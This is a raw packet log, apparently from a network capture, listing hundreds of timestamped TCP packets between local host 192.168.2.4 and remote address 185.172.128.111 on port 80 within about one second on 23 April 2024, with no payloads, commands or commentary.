Apr 23, 2024 09:27:03.698465109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698465109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698492050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698504925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698529005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698549986 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698565006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698580980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698601961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698611021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698638916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698658943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698674917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698698044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698709965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698728085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698745966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698762894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698781967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698796034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698820114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698843956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698854923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698868990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698890924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698900938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698926926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698936939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698961973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.698971033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.698998928 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699007988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699035883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699047089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699070930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699080944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699106932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699117899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699142933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699172020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699181080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699203968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699218988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699232101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699254990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699269056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699290037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699295998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699326038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699335098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699362040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699374914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699400902 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699415922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699435949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699446917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699471951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699481964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699508905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699518919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699546099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699561119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699582100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699593067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699618101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699631929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699654102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699665070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699688911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699700117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699724913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699749947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699760914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699774981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699800014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699811935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699835062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699846029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699871063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699878931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699907064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699919939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699944973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.699949980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.699985027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700012922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700020075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700035095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700054884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700066090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700090885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700107098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700134993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700145960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700182915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700192928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700217962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700229883 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700253963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700263977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700289965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700300932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700325966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700347900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700364113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700364113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700398922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700411081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700436115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700447083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700472116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700496912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700506926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700510979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700546026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700557947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700586081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700606108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700620890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700632095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700656891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700666904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700692892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700704098 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700728893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700741053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700767040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700778961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700803041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700814009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700839043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700849056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700875044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700886011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700911999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700930119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700948000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700961113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.700984955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.700995922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701020002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701034069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701056004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701066017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701091051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701105118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701127052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701137066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701170921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701190948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701208115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701216936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701245070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701256037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701281071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701292038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701316118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701329947 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701353073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701364040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701389074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701401949 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701425076 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701440096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701462030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701474905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701497078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701515913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701534033 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701544046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701570988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701582909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701607943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.701620102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.701653957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907447100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907504082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907541037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907577991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907618999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907632113 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907633066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907633066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907633066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907658100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907672882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907694101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907704115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907730103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907736063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907767057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907768965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907803059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907804012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907851934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.907860041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907896042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907932043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.907968044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908003092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908011913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908037901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908087969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908132076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908132076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908154964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908191919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908201933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908231020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908242941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908268929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908273935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908304930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908312082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908344984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908356905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908394098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908399105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908435106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908437967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908471107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908476114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908507109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908510923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908545017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908550978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908581972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908586979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908624887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908626080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908662081 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908667088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908699989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908703089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908735991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908740997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908772945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908777952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908811092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908823967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908845901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908848047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908888102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908890009 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908924103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908927917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908958912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908963919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.908997059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.908999920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909032106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909034967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909075975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909089088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909112930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909112930 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909149885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909156084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909187078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909192085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909224987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909229994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909260035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909265995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909296989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909302950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909333944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909337997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909389973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909455061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909491062 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909499884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909528971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909533978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909564018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909571886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909600973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909605980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909636974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909651041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909677982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909683943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909718037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909725904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909754038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909759045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909790039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909796000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909826994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909831047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909862995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909868002 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909899950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909904957 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909934998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909938097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.909971952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.909975052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910007954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910017014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910044909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910049915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910082102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910083055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910119057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910124063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910156012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910166025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910192013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910203934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910229921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910235882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910265923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910267115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910304070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910314083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910340071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910348892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910376072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910383940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910413027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910417080 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910449028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910458088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910485029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910494089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910521984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910528898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910557985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910566092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910594940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:03.910602093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:03.910630941 CEST	80	49730	185.172.128.111	192.168.2.4
